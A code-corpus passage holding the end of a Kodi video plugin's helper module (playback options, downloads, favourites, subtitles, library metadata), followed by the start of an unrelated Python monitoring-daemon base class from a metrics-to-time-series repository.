listitem = xbmcgui.ListItem( scrapedtitle, iconImage="DefaultFolder.png", thumbnailImage=scrapedthumbnail ) itemurl = '%s?channel=%s&action=%s&category=%s&url=%s&title=%s&thumbnail=%s' % ( sys.argv[ 0 ] , canal , accion , urllib.quote_plus( scrapedtitle ) , urllib.quote_plus( scrapedurl ) , urllib.quote_plus( scrapedtitle ) , urllib.quote_plus( scrapedthumbnail ) ) xbmcplugin.addDirectoryItem( handle = pluginhandle, url = itemurl , listitem=listitem, isFolder=True) def addfolder( canal , nombre , url , accion ): logger.info('[xbmctools.py] addfolder( "'+nombre+'" , "' + url + '" , "'+accion+'")"') listitem = xbmcgui.ListItem( nombre , iconImage="DefaultFolder.png") itemurl = '%s?channel=%s&action=%s&category=%s&url=%s' % ( sys.argv[ 0 ] , canal , accion , urllib.quote_plus(nombre) , urllib.quote_plus(url) ) xbmcplugin.addDirectoryItem( handle = pluginhandle, url = itemurl 
, listitem=listitem, isFolder=True) def addvideo( canal , nombre , url , category , server , Serie=""): logger.info('[xbmctools.py] addvideo( "'+nombre+'" , "' + url + '" , "'+server+ '" , "'+Serie+'")"') listitem = xbmcgui.ListItem( nombre, iconImage="DefaultVideo.png" ) listitem.setInfo( "video", { "Title" : nombre, "Plot" : nombre } ) itemurl = '%s?channel=%s&action=play&category=%s&url=%s&server=%s&title=%s&Serie=%s' % ( sys.argv[ 0 ] , canal , category , urllib.quote_plus(url) , server , urllib.quote_plus( nombre ) , Serie) xbmcplugin.addDirectoryItem( handle=pluginhandle, url=itemurl, listitem=listitem, isFolder=False) # FIXME: ¿Por qué no pasar el item en lugar de todos los parámetros? def play_video(channel="",server="",url="",category="",title="", thumbnail="",plot="",extra="",desdefavoritos=False,desdedescargados=False,desderrordescargas=False,strmfile=False,Serie="",subtitle="", video_password="",fulltitle=""): from servers import servertools import sys import xbmcgui,xbmc try: logger.info("[xbmctools.py] play_video(channel=%s, server=%s, url=%s, category=%s, title=%s, thumbnail=%s, plot=%s, desdefavoritos=%s, desdedescargados=%s, desderrordescargas=%s, strmfile=%s, Serie=%s, subtitle=%s" % (channel,server,url,category,title,thumbnail,plot,desdefavoritos,desdedescargados,desderrordescargas,strmfile,Serie,subtitle)) except: pass try: server = server.lower() except: server = "" if server=="": server="directo" try: from core import descargas download_enable=True except: download_enable=False view = False # Abre el diálogo de selección opciones = [] default_action = config.get_setting("default_action") logger.info("default_action="+default_action) # Si no es el modo normal, no muestra el diálogo porque cuelga XBMC muestra_dialogo = (config.get_setting("player_mode")=="0" and not strmfile) # Extrae las URL de los vídeos, y si no puedes verlo te dice el motivo video_urls,puedes,motivo = 
servertools.resolve_video_urls_for_playing(server,url,video_password,muestra_dialogo) # Si puedes ver el vídeo, presenta las opciones if puedes: for video_url in video_urls: opciones.append(config.get_localized_string(30151) + " " + video_url[0]) if server=="local": opciones.append(config.get_localized_string(30164)) else: if download_enable: opcion = config.get_localized_string(30153) opciones.append(opcion) # "Descargar" if channel=="favoritos": opciones.append(config.get_localized_string(30154)) # "Quitar de favoritos" else: opciones.append(config.get_localized_string(30155)) # "Añadir a favoritos" if not strmfile: opciones.append(config.get_localized_string(30161)) # "Añadir a Biblioteca" if download_enable: if channel!="descargas": opciones.append(config.get_localized_string(30157)) # "Añadir a lista de descargas" else: if category=="errores": opciones.append(config.get_localized_string(30159)) # "Borrar descarga definitivamente" opciones.append(config.get_localized_string(30160)) # "Pasar de nuevo a lista de descargas" else: opciones.append(config.get_localized_string(30156)) # "Quitar de lista de descargas" if config.get_setting("jdownloader_enabled")=="true": opciones.append(config.get_localized_string(30158)) # "Enviar a JDownloader" if config.get_setting("pyload_enabled")=="true": opciones.append(config.get_localized_string(30158).replace("jDownloader","pyLoad")) # "Enviar a pyLoad" if default_action=="3": seleccion = len(opciones)-1 # Busqueda de trailers en youtube if not channel in ["Trailer","ecarteleratrailers"]: opciones.append(config.get_localized_string(30162)) # "Buscar Trailer" # Si no puedes ver el vídeo te informa else: import xbmcgui if server!="": advertencia = xbmcgui.Dialog() if "<br/>" in motivo: resultado = advertencia.ok( "No puedes ver ese vídeo porque...",motivo.split("<br/>")[0],motivo.split("<br/>")[1],url) else: resultado = advertencia.ok( "No puedes ver ese vídeo porque...",motivo,url) else: resultado = advertencia.ok( "No puedes 
ver ese vídeo porque...","El servidor donde está alojado no está","soportado en pelisalacarta todavía",url) if channel=="favoritos": opciones.append(config.get_localized_string(30154)) # "Quitar de favoritos" if channel=="descargas": if category=="errores": opciones.append(config.get_localized_string(30159)) # "Borrar descarga definitivamente" else: opciones.append(config.get_localized_string(30156)) # "Quitar de lista de descargas" if len(opciones)==0: return # Si la accion por defecto es "Preguntar", pregunta if default_action=="0": # and server!="torrent": import xbmcgui dia = xbmcgui.Dialog() seleccion = dia.select(config.get_localized_string(30163), opciones) # "Elige una opción" #dia.close() ''' elif default_action=="0" and server=="torrent": advertencia = xbmcgui.Dialog() logger.info("video_urls[0]="+str(video_urls[0][1])) if puedes and ('"status":"COMPLETED"' in video_urls[0][1] or '"percent_done":100' in video_urls[0][1]): listo = "y está listo para ver" else: listo = "y se está descargando" resultado = advertencia.ok( "Torrent" , "El torrent ha sido añadido a la lista" , listo ) seleccion=-1 ''' elif default_action=="1": seleccion = 0 elif default_action=="2": seleccion = len(video_urls)-1 elif default_action=="3": seleccion = seleccion else: seleccion=0 logger.info("seleccion=%d" % seleccion) logger.info("seleccion=%s" % opciones[seleccion]) # No ha elegido nada, lo más probable porque haya dado al ESC if seleccion==-1: #Para evitar el error "Uno o más elementos fallaron" al cancelar la selección desde fichero strm listitem = xbmcgui.ListItem( title, iconImage="DefaultVideo.png", thumbnailImage=thumbnail) import sys xbmcplugin.setResolvedUrl(int(sys.argv[ 1 ]),False,listitem) # JUR Added #if config.get_setting("subtitulo") == "true": # config.set_setting("subtitulo", "false") return if opciones[seleccion]==config.get_localized_string(30158): # "Enviar a JDownloader" #d = {"web": url}urllib.urlencode(d) from core import scrapertools if subtitle!="": data 
= scrapertools.cachePage(config.get_setting("jdownloader")+"/action/add/links/grabber0/start1/web="+url+ " " +thumbnail + " " + subtitle) else: data = scrapertools.cachePage(config.get_setting("jdownloader")+"/action/add/links/grabber0/start1/web="+url+ " " +thumbnail) return if opciones[seleccion]==config.get_localized_string(30158).replace("jDownloader","pyLoad"): # "Enviar a pyLoad" logger.info("Enviando a pyload...") if Serie!="": package_name = Serie else: package_name = "pelisalacarta" from core import pyload_client pyload_client.download(url=url,package_name=package_name) return elif opciones[seleccion]==config.get_localized_string(30164): # Borrar archivo en descargas # En "extra" está el nombre del fichero en favoritos import os os.remove( url ) xbmc.executebuiltin( "Container.Refresh" ) return # Ha elegido uno de los vídeos elif seleccion < len(video_urls): mediaurl = video_urls[seleccion][1] if len(video_urls[seleccion])>2: wait_time = video_urls[seleccion][2] else: wait_time = 0 view = True # Descargar elif opciones[seleccion]==config.get_localized_string(30153): # "Descargar" import xbmc # El vídeo de más calidad es el último mediaurl = video_urls[len(video_urls)-1][1] from core import downloadtools keyboard = xbmc.Keyboard(fulltitle) keyboard.doModal() if (keyboard.isConfirmed()): title = keyboard.getText() devuelve = downloadtools.downloadbest(video_urls,title) if devuelve==0: advertencia = xbmcgui.Dialog() resultado = advertencia.ok("plugin" , "Descargado con éxito") elif devuelve==-1: advertencia = xbmcgui.Dialog() resultado = advertencia.ok("plugin" , "Descarga abortada") else: advertencia = xbmcgui.Dialog() resultado = advertencia.ok("plugin" , "Error en la descarga") return elif opciones[seleccion]==config.get_localized_string(30154): #"Quitar de favoritos" from core import favoritos # En "extra" está el nombre del fichero en favoritos favoritos.deletebookmark(urllib.unquote_plus( extra )) advertencia = xbmcgui.Dialog() resultado = 
advertencia.ok(config.get_localized_string(30102) , title , config.get_localized_string(30105)) # 'Se ha quitado de favoritos' xbmc.executebuiltin( "Container.Refresh" ) return elif opciones[seleccion]==config.get_localized_string(30159): #"Borrar descarga definitivamente" from core import descargas descargas.delete_error_bookmark(urllib.unquote_plus( extra )) advertencia = xbmcgui.Dialog() resultado = advertencia.ok(config.get_localized_string(30101) , title , config.get_localized_string(30106)) # 'Se ha quitado de la lista' xbmc.executebuiltin( "Container.Refresh" ) return elif opciones[seleccion]==config.get_localized_string(30160): #"Pasar de nuevo a lista de descargas": from core import descargas descargas.mover_descarga_error_a_pendiente(urllib.unquote_plus( extra )) advertencia = xbmcgui.Dialog() resultado = advertencia.ok(config.get_localized_string(30101) , title , config.get_localized_string(30107)) # 'Ha pasado de nuevo a la lista de descargas' return elif opciones[seleccion]==config.get_localized_string(30155): #"Añadir a favoritos": from core import favoritos from core import downloadtools keyboard = xbmc.Keyboard(downloadtools.limpia_nombre_excepto_1(fulltitle)+" ["+channel+"]") keyboard.doModal() if keyboard.isConfirmed(): title = keyboard.getText() favoritos.savebookmark(titulo=title,url=url,thumbnail=thumbnail,server=server,plot=plot,fulltitle=title) advertencia = xbmcgui.Dialog() resultado = advertencia.ok(config.get_localized_string(30102) , title , config.get_localized_string(30108)) # 'se ha añadido a favoritos' return elif opciones[seleccion]==config.get_localized_string(30156): #"Quitar de lista de descargas": from core import descargas # La categoría es el nombre del fichero en la lista de descargas descargas.deletebookmark((urllib.unquote_plus( extra ))) advertencia = xbmcgui.Dialog() resultado = advertencia.ok(config.get_localized_string(30101) , title , config.get_localized_string(30106)) # 'Se ha quitado de lista de descargas' 
xbmc.executebuiltin( "Container.Refresh" ) return elif opciones[seleccion]==config.get_localized_string(30157): #"Añadir a lista de descargas": from core import descargas from core import downloadtools keyboard = xbmc.Keyboard(downloadtools.limpia_nombre_excepto_1(fulltitle)) keyboard.doModal() if keyboard.isConfirmed(): title = keyboard.getText() descargas.savebookmark(titulo=title,url=url,thumbnail=thumbnail,server=server,plot=plot,fulltitle=title) advertencia = xbmcgui.Dialog() resultado = advertencia.ok(config.get_localized_string(30101) , title , config.get_localized_string(30109)) # 'se ha añadido a la lista de descargas' return elif opciones[seleccion]==config.get_localized_string(30161): #"Añadir a Biblioteca": # Library from platformcode.xbmc import library titulo = fulltitle if fulltitle=="": titulo = title library.savelibrary(titulo,url,thumbnail,server,plot,canal=channel,category=category,Serie=Serie) advertencia = xbmcgui.Dialog() resultado = advertencia.ok(config.get_localized_string(30101) , fulltitle , config.get_localized_string(30135)) # 'se ha añadido a la lista de descargas' return elif opciones[seleccion]==config.get_localized_string(30162): #"Buscar Trailer": config.set_setting("subtitulo", "false") import sys xbmc.executebuiltin("Container.Update(%s?channel=%s&action=%s&category=%s&title=%s&url=%s&thumbnail=%s&plot=%s&server=%s)" % ( sys.argv[ 0 ] , "trailertools" , "buscartrailer" , urllib.quote_plus( category ) , urllib.quote_plus( fulltitle ) , urllib.quote_plus( url ) , urllib.quote_plus( thumbnail ) , urllib.quote_plus( "" ) , server )) return # Si no hay mediaurl es porque el vídeo no está :) logger.info("[xbmctools.py] mediaurl="+mediaurl) if mediaurl=="": logger.info("b1") if server == "unknown": alertUnsopportedServer() else: alertnodisponibleserver(server) return # Si hay un tiempo de espera (como en megaupload), lo impone ahora if wait_time>0: logger.info("b2") continuar = handle_wait(wait_time,server,"Cargando vídeo...") if not 
continuar: return # Obtención datos de la Biblioteca (solo strms que estén en la biblioteca) import xbmcgui if strmfile: logger.info("b3") xlistitem = getLibraryInfo(mediaurl) else: logger.info("b4") try: xlistitem = xbmcgui.ListItem( title, iconImage="DefaultVideo.png", thumbnailImage=thumbnail, path=mediaurl) except: xlistitem = xbmcgui.ListItem( title, iconImage="DefaultVideo.png", thumbnailImage=thumbnail) xlistitem.setInfo( "video", { "Title": title, "Plot" : plot , "Studio" : channel , "Genre" : category } ) # Descarga el subtitulo if channel=="cuevana" and subtitle!="" and (opciones[seleccion].startswith("Ver") or opciones[seleccion].startswith("Watch")): logger.info("b5") try: import os ficherosubtitulo = os.path.join( config.get_data_path(), 'subtitulo.srt' ) if os.path.exists(ficherosubtitulo): try: os.remove(ficherosubtitulo) except IOError: logger.info("Error al eliminar el archivo subtitulo.srt "+ficherosubtitulo) raise from core import scrapertools data = scrapertools.cache_page(subtitle) #print data fichero = open(ficherosubtitulo,"w") fichero.write(data) fichero.close() #from core import downloadtools #downloadtools.downloadfile(subtitle, ficherosubtitulo ) except: logger.info("Error al descargar el subtítulo") # Lanza el reproductor if strmfile: #Si es un fichero strm no hace falta el play logger.info("b6") import sys xbmcplugin.setResolvedUrl(int(sys.argv[ 1 ]),True,xlistitem) #if subtitle!="" and (opciones[seleccion].startswith("Ver") or opciones[seleccion].startswith("Watch")): # logger.info("[xbmctools.py] Con subtitulos") # setSubtitles() else: logger.info("b7") logger.info("player_mode="+config.get_setting("player_mode")) logger.info("mediaurl="+mediaurl) if config.get_setting("player_mode")=="3" or "megacrypter.com" in mediaurl: logger.info("b11") import download_and_play download_and_play.download_and_play( mediaurl , "download_and_play.tmp" , config.get_setting("downloadpath") ) return elif config.get_setting("player_mode")=="0" or 
(config.get_setting("player_mode")=="3" and mediaurl.startswith("rtmp")): logger.info("b8") # Añadimos el listitem a una lista de reproducción (playlist) playlist = xbmc.PlayList( xbmc.PLAYLIST_VIDEO ) playlist.clear() playlist.add( mediaurl, xlistitem ) # Reproduce playersettings = config.get_setting('player_type') logger.info("[xbmctools.py] playersettings="+playersettings) player_type = xbmc.PLAYER_CORE_AUTO if playersettings == "0": player_type = xbmc.PLAYER_CORE_AUTO logger.info("[xbmctools.py] PLAYER_CORE_AUTO") elif playersettings == "1": player_type = xbmc.PLAYER_CORE_MPLAYER logger.info("[xbmctools.py] PLAYER_CORE_MPLAYER") elif playersettings == "2": player_type = xbmc.PLAYER_CORE_DVDPLAYER logger.info("[xbmctools.py] PLAYER_CORE_DVDPLAYER") xbmcPlayer = xbmc.Player( player_type ) xbmcPlayer.play(playlist) if channel=="cuevana" and subtitle!="": logger.info("subtitulo="+subtitle) if subtitle!="" and (opciones[seleccion].startswith("Ver") or opciones[seleccion].startswith("Watch")): logger.info("[xbmctools.py] Con subtitulos") setSubtitles() elif config.get_setting("player_mode")=="1": logger.info("b9") #xlistitem.setProperty('IsPlayable', 'true') #xlistitem.setProperty('path', mediaurl) xbmcplugin.setResolvedUrl(int(sys.argv[1]), True, xbmcgui.ListItem(path=mediaurl)) elif config.get_setting("player_mode")=="2": logger.info("b10") xbmc.executebuiltin( "PlayMedia("+mediaurl+")" ) # Descarga en segundo plano para vidxden, sólo en modo free ''' elif server=="vidxden" and seleccion==0: from core import downloadtools import thread,os import xbmc logger.info("[xbmctools.py] ---------------------------------") logger.info("[xbmctools.py] DESCARGA EN SEGUNDO PLANO") logger.info("[xbmctools.py] de "+mediaurl) temp_file = config.get_temp_file("background.file") if os.path.exists(temp_file): os.remove(temp_file) logger.info("[xbmctools.py] a "+temp_file) logger.info("[xbmctools.py] ---------------------------------") 
thread.start_new_thread(downloadtools.downloadfile, (mediaurl,temp_file), {'silent':True}) handle_wait(60,"Descarga en segundo plano","Se está descargando un trozo antes de empezar") playlist = xbmc.PlayList( xbmc.PLAYLIST_VIDEO ) playlist.clear() playlist.add( temp_file, xlistitem ) player_type = xbmc.PLAYER_CORE_AUTO xbmcPlayer = xbmc.Player( player_type ) xbmcPlayer.play(playlist) while xbmcPlayer.isPlaying(): xbmc.sleep(5000) logger.info("sigo aquí...") logger.info("fin") ''' if config.get_setting("subtitulo") == "true" and view: logger.info("b11") from core import subtitletools wait2second() subtitletools.set_Subtitle() if subtitle!="": xbmc.Player().setSubtitles(subtitle) #FIXME: Qué cosa más fea... elif channel=="moviezet": xbmc.Player().setSubtitles(subtitle) def handle_wait(time_to_wait,title,text): logger.info ("[xbmctools.py] handle_wait(time_to_wait=%d)" % time_to_wait) import xbmc,xbmcgui espera = xbmcgui.DialogProgress() ret = espera.create(' '+title) secs=0 percent=0 increment = int(100 / time_to_wait) cancelled = False while secs < time_to_wait: secs = secs + 1 percent = increment*secs secs_left = str((time_to_wait - secs)) remaining_display = ' Espera '+secs_left+' segundos para que comience el vídeo...' 
        # (continuation of handle_wait(), whose `def` appears earlier in the file)
        espera.update(percent,' '+text,remaining_display)
        xbmc.sleep(1000)
        if (espera.iscanceled()):
            cancelled = True
            break

    if cancelled == True:
        logger.info ('Espera cancelada')
        return False
    else:
        logger.info ('Espera finalizada')
        return True

def getLibraryInfo (mediaurl):
    '''Gets information from the Library if available (strm files) or from the parameters.

    Builds an xbmcgui.ListItem for `mediaurl` out of the InfoLabels of the
    ListItem currently focused in Kodi (only meaningful for .strm playback).
    Returns the populated ListItem.
    '''
    if DEBUG: logger.info('[xbmctools.py] playlist OBTENCIÓN DE DATOS DE BIBLIOTECA')

    # Basic information taken from the currently focused ListItem.
    label = xbmc.getInfoLabel( 'listitem.label' )
    label2 = xbmc.getInfoLabel( 'listitem.label2' )
    iconImage = xbmc.getInfoImage( 'listitem.icon' )
    thumbnailImage = xbmc.getInfoImage( 'listitem.Thumb' ) #xbmc.getInfoLabel( 'listitem.thumbnailImage' )
    if DEBUG:
        logger.info ("[xbmctools.py]getMediaInfo: label = " + label)
        logger.info ("[xbmctools.py]getMediaInfo: label2 = " + label2)
        logger.info ("[xbmctools.py]getMediaInfo: iconImage = " + iconImage)
        logger.info ("[xbmctools.py]getMediaInfo: thumbnailImage = " + thumbnailImage)

    # ListItem creation.
    listitem = xbmcgui.ListItem(label, label2, iconImage, thumbnailImage, mediaurl)

    # Additional information: (InfoLabel name, conversion type) pairs, where
    # 's' = keep as string, 'i' = int(), 'f' = float().
    lista = [
        ('listitem.genre', 's'), #(Comedy)
        ('listitem.year', 'i'), #(2009)
        ('listitem.episode', 'i'), #(4)
        ('listitem.season', 'i'), #(1)
        ('listitem.top250', 'i'), #(192)
        ('listitem.tracknumber', 'i'), #(3)
        ('listitem.rating', 'f'), #(6.4) - range is 0..10
        # ('listitem.watched', 'd'), # depreciated. use playcount instead
        ('listitem.playcount', 'i'), #(2) - number of times this item has been played
        # ('listitem.overlay', 'i'), #(2) - range is 0..8. See GUIListItem.h for values
        ('listitem.overlay', 's'), # JUR - the listitem returns a string, but addinfo expects an int. See the translation below
        ('listitem.cast', 's'), # (Michal C. Hall) - List concatenated into a string
        ('listitem.castandrole', 's'), #(Michael C. Hall|Dexter) - List concatenated into a string
        ('listitem.director', 's'), #(Dagur Kari)
        ('listitem.mpaa', 's'), #(PG-13)
        ('listitem.plot', 's'), #(Long Description)
        ('listitem.plotoutline', 's'), #(Short Description)
        ('listitem.title', 's'), #(Big Fan)
        ('listitem.duration', 's'), #(3)
        ('listitem.studio', 's'), #(Warner Bros.)
        ('listitem.tagline', 's'), #(An awesome movie) - short description of movie
        ('listitem.writer', 's'), #(Robert D. Siegel)
        ('listitem.tvshowtitle', 's'), #(Heroes)
        ('listitem.premiered', 's'), #(2005-03-04)
        ('listitem.status', 's'), #(Continuing) - status of a TVshow
        ('listitem.code', 's'), #(tt0110293) - IMDb code
        ('listitem.aired', 's'), #(2008-12-07)
        ('listitem.credits', 's'), #(Andy Kaufman) - writing credits
        ('listitem.lastplayed', 's'), #(%Y-%m-%d %h
        ('listitem.album', 's'), #(The Joshua Tree)
        ('listitem.votes', 's'), #(12345 votes)
        ('listitem.trailer', 's'), #(/home/user/trailer.avi)
        ]

    # Collect every available InfoLabel into a dict for setInfo().
    # Empty values are skipped so setInfo() only sees real data.
    infodict = dict()
    for label,tipo in lista:
        key = label.split('.',1)[1]
        value = xbmc.getInfoLabel( label )
        if value != "":
            if DEBUG: logger.info ("[xbmctools.py]getMediaInfo: "+key+" = " + value)
            #infoimage=infolabel
            if tipo == 's':
                infodict[key]=value
            elif tipo == 'i':
                infodict[key]=int(value)
            elif tipo == 'f':
                infodict[key]=float(value)

    # Translate the overlay value from string to the int code setInfo() expects;
    # unknown overlay strings are dropped entirely.
    if infodict.has_key('overlay'):
        value = infodict['overlay'].lower()
        if value.find('rar') > -1:
            infodict['overlay'] = 1
        elif value.find('zip')> -1:
            infodict['overlay'] = 2
        elif value.find('trained')> -1:
            infodict['overlay'] = 3
        elif value.find('hastrainer')> -1:
            infodict['overlay'] = 4
        elif value.find('locked')> -1:
            infodict['overlay'] = 5
        elif value.find('unwatched')> -1:
            infodict['overlay'] = 6
        elif value.find('watched')> -1:
            infodict['overlay'] = 7
        elif value.find('hd')> -1:
            infodict['overlay'] = 8
        else:
            infodict.pop('overlay')

    if len (infodict) > 0:
        listitem.setInfo( "video", infodict )

    return listitem

def alertnodisponible():
    # Dialog: 30055 'Vídeo no disponible' / 30056 'No se han podido localizar videos en la página del canal'
    advertencia = xbmcgui.Dialog()
    resultado = advertencia.ok(config.get_localized_string(30055) , config.get_localized_string(30056))

def alertnodisponibleserver(server):
    # Dialog: 30057 'El vídeo ya no está en %s' / 30058 'Prueba en otro servidor o en otro canal'
    advertencia = xbmcgui.Dialog()
    resultado = advertencia.ok( config.get_localized_string(30055),(config.get_localized_string(30057)%server),config.get_localized_string(30058))

def alertUnsopportedServer():
    # Dialog: 30065 'Servidor no soportado o desconocido' / 30058 'Prueba en otro servidor o en otro canal'
    advertencia = xbmcgui.Dialog()
    resultado = advertencia.ok( config.get_localized_string(30065),config.get_localized_string(30058))

def alerterrorpagina():
    # Dialog: 30059 'Error en el sitio web' / 30060 'No se puede acceder por un error en el sitio web'
    advertencia = xbmcgui.Dialog()
    resultado = advertencia.ok(config.get_localized_string(30059) , config.get_localized_string(30060))

def alertanomegauploadlow(server):
    # Dialog: quality not available / video deleted / try another quality.
    # NOTE(review): the `server` parameter is unused here — kept for signature
    # compatibility with the other alert helpers.
    advertencia = xbmcgui.Dialog()
    resultado = advertencia.ok( config.get_localized_string(30055) , config.get_localized_string(30061) , config.get_localized_string(30062))

# Added by JUR.
# STRM file support.

def playstrm(params, url, category):
    """Plays a video referenced from a .strm library file.

    Title and plot are read from the ListItem currently focused in Kodi; the
    rest comes from the plugin parameters. Delegates to play_video() with
    strmfile=True.
    """
    logger.info("[xbmctools.py] playstrm url=" + url)
    title = unicode(xbmc.getInfoLabel("ListItem.Title"), "utf-8")
    thumbnail = urllib.unquote_plus(params.get("thumbnail"))
    plot = unicode(xbmc.getInfoLabel("ListItem.Plot"), "utf-8")
    server = params["server"]
    # dict.get with a default replaces the old has_key()/else dance (same behavior).
    serie = params.get("Serie", "")
    subtitle = params.get("subtitle", "")

    from core.item import Item
    from core.subtitletools import saveSubtitleName
    saveSubtitleName(Item(title=title, show=serie))

    play_video("Biblioteca pelisalacarta", server, url, category, title, thumbnail,
               plot, strmfile=True, Serie=serie, subtitle=subtitle)


def renderItems(itemlist, params, url, category, isPlayable='false'):
    """Renders a channel's item list as a Kodi directory.

    Fills in missing per-item fields (category, fulltitle, fanart), adds one
    folder or video entry per item, then closes the directory and applies the
    forced view mode if configured.
    """
    viewmode = "list"
    if itemlist is not None:  # `<>` operator replaced: removed in Python 3, `!=`/`is not` everywhere
        for item in itemlist:
            # Inherit defaults from the current listing when the channel left them empty.
            if item.category == "":
                item.category = category
            if item.fulltitle == "":
                item.fulltitle = item.title
            if item.fanart == "":
                # Per-channel fanart if present, otherwise the plugin's default.
                channel_fanart = os.path.join(config.get_runtime_path(), 'resources', 'images', 'fanart', item.channel + '.jpg')
                if os.path.exists(channel_fanart):
                    item.fanart = channel_fanart
                else:
                    item.fanart = os.path.join(config.get_runtime_path(), "fanart.jpg")

            if item.folder:
                if len(item.extra) > 0:
                    addnewfolderextra(item.channel, item.action, item.category, item.title, item.url, item.thumbnail, item.plot, extradata=item.extra, totalItems=len(itemlist), fanart=item.fanart, context=item.context, show=item.show, fulltitle=item.fulltitle)
                else:
                    addnewfolder(item.channel, item.action, item.category, item.title, item.url, item.thumbnail, item.plot, totalItems=len(itemlist), fanart=item.fanart, context=item.context, show=item.show, fulltitle=item.fulltitle)
            else:
                if config.get_setting("player_mode") == "1":
                    # SetResolvedUrl requires "isPlayable = true".
                    isPlayable = "true"
                if item.duration:
                    addnewvideo(item.channel, item.action, item.category, item.server, item.title, item.url, item.thumbnail, item.plot, "", duration=item.duration, fanart=item.fanart, IsPlayable=isPlayable, context=item.context, subtitle=item.subtitle, totalItems=len(itemlist), show=item.show, password=item.password, extra=item.extra, fulltitle=item.fulltitle)
                else:
                    addnewvideo(item.channel, item.action, item.category, item.server, item.title, item.url, item.thumbnail, item.plot, fanart=item.fanart, IsPlayable=isPlayable, context=item.context, subtitle=item.subtitle, totalItems=len(itemlist), show=item.show, password=item.password, extra=item.extra, fulltitle=item.fulltitle)

            # Any item may override the directory's view mode.
            if item.viewmode != "list":
                viewmode = item.viewmode

    # Close the directory.
    xbmcplugin.setContent(pluginhandle, "Movies")
    xbmcplugin.setPluginCategory(handle=pluginhandle, category=category)
    xbmcplugin.addSortMethod(handle=pluginhandle, sortMethod=xbmcplugin.SORT_METHOD_NONE)

    # Library view modes:  MediaInfo3 - 503
    # File view modes:     WideIconView - 505 / ThumbnailView - 500
    if config.get_setting("forceview") == "true":
        if viewmode == "list":
            xbmc.executebuiltin("Container.SetViewMode(50)")
        elif viewmode == "movie_with_plot":
            xbmc.executebuiltin("Container.SetViewMode(503)")
        elif viewmode == "movie":
            xbmc.executebuiltin("Container.SetViewMode(500)")

    xbmcplugin.endOfDirectory(handle=pluginhandle, succeeded=True)


def wait2second():
    """Polls (2s steps, ~20s max) until the Kodi player is actually playing."""
    logger.info("[xbmctools.py] wait2second")
    import time
    contador = 0
    while xbmc.Player().isPlayingVideo() == False:
        logger.info("[xbmctools.py] setSubtitles: Waiting 2 seconds for video to start before setting subtitles")
        time.sleep(2)
        contador = contador + 1
        if contador > 10:
            break


def setSubtitles():
    """Attaches the previously downloaded subtitulo.srt to the running player."""
    logger.info("[xbmctools.py] setSubtitles")
    # The original duplicated wait2second()'s loop verbatim; reuse the helper.
    wait2second()
    subtitlefile = os.path.join(config.get_data_path(), 'subtitulo.srt')
    logger.info("[xbmctools.py] setting subtitle file %s" % subtitlefile)
    xbmc.Player().setSubtitles(subtitlefile)


def trailer(item):
    """Launches the trailer-search channel for the given item."""
    logger.info("[xbmctools.py] trailer")
    config.set_setting("subtitulo", "false")
    import sys
    # BUGFIX: the format string has 9 %s placeholders but only 8 values were
    # supplied (server was missing), so this raised "not enough arguments for
    # format string" at runtime. The analogous builtin call in play_video()
    # passes the server as the last value; do the same here.
    xbmc.executebuiltin("XBMC.RunPlugin(%s?channel=%s&action=%s&category=%s&title=%s&url=%s&thumbnail=%s&plot=%s&server=%s)" % (
        sys.argv[0], "trailertools", "buscartrailer",
        urllib.quote_plus(item.category), urllib.quote_plus(item.fulltitle),
        urllib.quote_plus(item.url), urllib.quote_plus(item.thumbnail),
        urllib.quote_plus(""), item.server))
    return


def alert_no_puedes_ver_video(server, url, motivo):
    """Shows a dialog explaining why a video cannot be played.

    `motivo` may contain a single "<br/>" to split the reason over two lines.
    """
    import xbmcgui
    # BUGFIX: the dialog was only created inside the server!="" branch, so the
    # else branch crashed with NameError. Create it unconditionally.
    advertencia = xbmcgui.Dialog()
    if server != "":
        if "<br/>" in motivo:
            resultado = advertencia.ok("No puedes ver ese vídeo porque...",
                                       motivo.split("<br/>")[0],
                                       motivo.split("<br/>")[1], url)
        else:
            resultado = advertencia.ok("No puedes ver ese vídeo porque...", motivo, url)
    else:
        resultado = advertencia.ok("No puedes ver ese vídeo porque...",
                                   "El servidor donde está alojado no está",
                                   "soportado en pelisalacarta todavía", url)
gpl-3.0
JonatanEnes/metrics-to-time-series
src/daemons/daemon_utils.py
1
7841
#!/usr/bin/env python
"""Base class and helpers for daemons that keep a subprocess pipeline alive.

A concrete daemon subclasses MonitoringDaemon, implements create_pipeline(),
and gets: pipeline launch/restart on failure, output forwarding, an optional
CouchDB heartbeat thread, and config/environment plumbing.
"""
from __future__ import print_function
import abc
import traceback
from threading import Thread
import os
import time
import configparser
import errno
import subprocess
import sys
import logging
import requests

# Directory containing this module; logs/ and pids/ live alongside it.
_base_path = os.path.dirname(os.path.abspath(__file__))


def eprint(*args, **kwargs):
    """print() to stderr."""
    print(*args, file=sys.stderr, **kwargs)


class MonitoringDaemon:
    # Abstract base (Python 2-style declaration): create_pipeline() must be
    # provided by subclasses.
    __metaclass__ = abc.ABCMeta

    def __init__(self, service_name, logger):
        self.SERVICE_NAME = service_name
        self.logger = logger
        # Paths consumed by the python-daemon runner.
        self.stdin_path = '/dev/null'
        self.stdout_path = os.path.join(_base_path, "logs/" + self.SERVICE_NAME + ".out")
        self.stderr_path = os.path.join(_base_path, "logs/" + self.SERVICE_NAME + ".err")
        self.pidfile_path = os.path.join(_base_path, "pids/" + self.SERVICE_NAME + ".pid")
        self.pidfile_timeout = 5
        # Pipeline restart bookkeeping: give up after MAX_TRIES failures.
        self.pipeline_tries = 0
        self.MAX_TRIES = 5
        self.processes_list = []
        self.dumper_thread = None
        self.environment = dict()
        # To be set by subclasses: a predicate over the environment, and the
        # message to print when it fails.
        self.is_runnable = None
        self.not_runnable_message = None

    def reload_pipeline(self, _signo, _stack_frame):
        """Signal handler: tear the pipeline down and build a fresh one."""
        self.logger.info("Going to reload pipeline")
        self.destroy_pipeline()
        self.processes_list = list()
        self.launch_pipeline()

    def launch_pipeline(self):
        """Starts the subprocess pipeline and the output-dumper thread."""
        self.logger.info("Launching pipeline")
        self.processes_list += self.create_pipeline()
        # Launch thread to log last process output (send to opentsdb of pipeline)
        thread = Thread(target=self.threaded_read_last_process_output, args=(self.processes_list[-1],))
        thread.start()
        self.dumper_thread = thread

    def beat(self):
        """Heartbeat loop: marks this service alive in CouchDB every 10s.

        Runs forever; intended to be executed in a daemon thread.
        """
        # Project-local imports kept inside the method so the module can be
        # imported without these packages on the path.
        from StateDatabase import couchDB as couchDB
        from MyUtils import MyUtils as MyUtils
        self.logger.info("Starting heartbeat of " + self.SERVICE_NAME)
